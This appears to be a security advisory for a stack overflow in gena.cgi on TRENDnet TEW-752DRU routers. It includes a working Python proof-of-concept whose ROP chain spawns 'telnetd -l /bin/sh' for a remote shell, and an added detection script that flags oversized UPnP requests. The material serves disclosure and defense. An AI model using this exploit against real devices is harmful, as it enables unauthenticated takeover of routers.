@XiaoCurry
Last active August 26, 2024 20:00
CVE_TRENDnet_report

Information

Vendor of the products: TRENDnet

Vendor's website: http://www.trendnet.com.cn/

Reported by: Chen Xiao(2235254941@qq.com)

Affected products: TRENDnet TEW-752DRU Routers

Affected firmware version: FW1.03B01

Firmware download address: TRENDnet TEW-752DRU

Overview

In TRENDnet TEW-752DRU routers running firmware FW1.03B01, there is a stack buffer overflow because gena.cgi does not verify the length of the service field before it is passed to sprintf. An attacker who successfully exploits this vulnerability can crash the remote device or execute arbitrary commands by sending a crafted request to /gena.cgi (the PoC below uses the UNSUBSCRIBE method).

Vulnerability details

The function at address 0x40E9BC in the /htdocs/cgibin binary does not check the length of the SID field before passing it to sprintf, which creates a stack overflow risk.

[Figure 1]

It is evident that injecting oversized data into v2 or a1 leads to a buffer overflow, which can be exploited for code execution or used to cause a denial of service. Here, v2 is HTTP_SID and a1 is service, both of which are attacker-controlled.

The function at 0x40E9BC is called within the genacgi_main function.

[Figure 2]

Therefore, the request method must be UNSUBSCRIBE to reach this code path.

The /etc/services/HTTP/httpsvcs.php file shows that gena.cgi belongs to the UPnP service.

[Figure 3]

In the upnpsetup function of the same /etc/services/HTTP/httpsvcs.php file, it can be seen that the UPnP service accepts requests on port 49152.

[Figure 4]

PoC

Send the following UNSUBSCRIBE request to /gena.cgi on port 49152; the command is injected via the service field.

# python3
from pwn import context, p32
from socket import socket, AF_INET, SOCK_STREAM, gethostbyname
from os import system
from time import sleep
context(os='linux', arch='mips')

libc_base = 0x2aaf8000

s = socket(AF_INET, SOCK_STREAM)

cmd = b'telnetd -l /bin/sh;'
payload = b'a'*462
payload += p32(libc_base + 0x53200 - 1) # s0  system_addr - 1
payload += p32(libc_base + 0x169C4) # s1  addiu $s2, $sp, 0x18 (=> jalr $s0)
payload += b'a'*4 # s2
payload += p32(libc_base + 0x32A98) # ra  addiu $s0, 1 (=> jalr $s1)
payload += b'a'*0x18 # padding
payload += cmd

msg = b"UNSUBSCRIBE /gena.cgi?service=" + payload + b" HTTP/1.1\r\n"
msg += b"Host: localhost:49152\r\n"
msg += b"SID: 1\r\n\r\n"

s.connect((gethostbyname("192.168.10.1"), 49152))
s.send(msg)

sleep(1)
system("telnet 192.168.10.1 23")
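The request shape above (UNSUBSCRIBE to /gena.cgi on port 49152 with an oversized service parameter, plus a SID header that reaches the same sprintf) is what a defender would look for in captured UPnP traffic. The following Python is an added detection example; it is not part of the original report and not vendor code. The sample requests are constructed, and the length thresholds (MAX_SERVICE_LEN, MAX_SID_LEN, MAX_REQUEST_LINE) are assumptions to be tuned against the device's real buffer sizes.

```python
from urllib.parse import urlsplit, parse_qsl

# Constructed sample requests (not captured traffic). 192.0.2.1 is a
# documentation address standing in for the router.
BENIGN = (
    b"UNSUBSCRIBE /gena.cgi?service=WANIPConnection HTTP/1.1\r\n"
    b"Host: 192.0.2.1:49152\r\n"
    b"SID: uuid:12345678-1234-1234-1234-123456789abc\r\n\r\n"
)
SUSPICIOUS = (
    b"UNSUBSCRIBE /gena.cgi?service=" + b"A" * 600 + b" HTTP/1.1\r\n"
    + b"Host: 192.0.2.1:49152\r\n"
    + b"SID: 1\r\n\r\n"
)
NONPRINTABLE = (
    b"UNSUBSCRIBE /gena.cgi?service=ab\x01cd HTTP/1.1\r\n"
    + b"Host: 192.0.2.1:49152\r\n"
    + b"SID: " + b"B" * 200 + b"\r\n\r\n"
)

# Assumed limits for illustration; the report does not state the real
# buffer sizes, so tune these to the firmware being protected.
MAX_SERVICE_LEN = 128
MAX_SID_LEN = 128
MAX_REQUEST_LINE = 512


def parse_headers(lines):
    """Map lower-cased header names to values; malformed lines are skipped."""
    headers = {}
    for line in lines:
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return headers


def assess(raw: bytes) -> list:
    """Return a list of findings for one raw HTTP request to gena.cgi.

    An empty list means nothing about the request matches the overflow
    pattern. Requests to other endpoints are ignored.
    """
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    request_line = lines[0]
    findings = []
    if b"gena.cgi" not in request_line:
        return findings

    # A request line far longer than any legitimate UPnP subscription URL
    # is suspicious on its own, even if the query fails to parse below.
    if len(request_line) > MAX_REQUEST_LINE:
        findings.append(f"request line is {len(request_line)} bytes (limit {MAX_REQUEST_LINE})")

    parts = request_line.split(b" ")
    if len(parts) != 3:
        findings.append("malformed request line (stray spaces or missing HTTP version)")
        return findings
    _method, target, _version = parts

    # latin-1 keeps every byte value so binary payload bytes survive parsing.
    url = urlsplit(target.decode("latin-1"))
    # Check every value named "service", not just the last one, so a
    # duplicated parameter cannot hide the long copy.
    services = [v for k, v in parse_qsl(url.query, keep_blank_values=True) if k == "service"]
    for service in services:
        if len(service) > MAX_SERVICE_LEN:
            findings.append(f"service parameter length {len(service)} exceeds {MAX_SERVICE_LEN}")
        if any(not 0x20 <= ord(c) <= 0x7E for c in service):
            findings.append("non-printable bytes in service parameter")

    sid = parse_headers(lines[1:]).get("sid", "")
    if len(sid) > MAX_SID_LEN:
        findings.append(f"SID header length {len(sid)} exceeds {MAX_SID_LEN}")
    return findings


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspicious", SUSPICIOUS), ("nonprintable", NONPRINTABLE)):
        print(label, assess(sample) or "no findings")
```

The check is deliberately applied to the raw request rather than to a parsed object, because the overflow lives in the CGI's own string handling and a request that breaks the parser is itself a signal. Note that parse_qsl percent-decodes values, so a payload sent URL-encoded is measured at its decoded length, which is the length sprintf would see.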

Attack Demonstration

Remote login to the device after the request is sent.

[Figure 5]

The Telnet service on port 23 is now active.

[Figure 6]
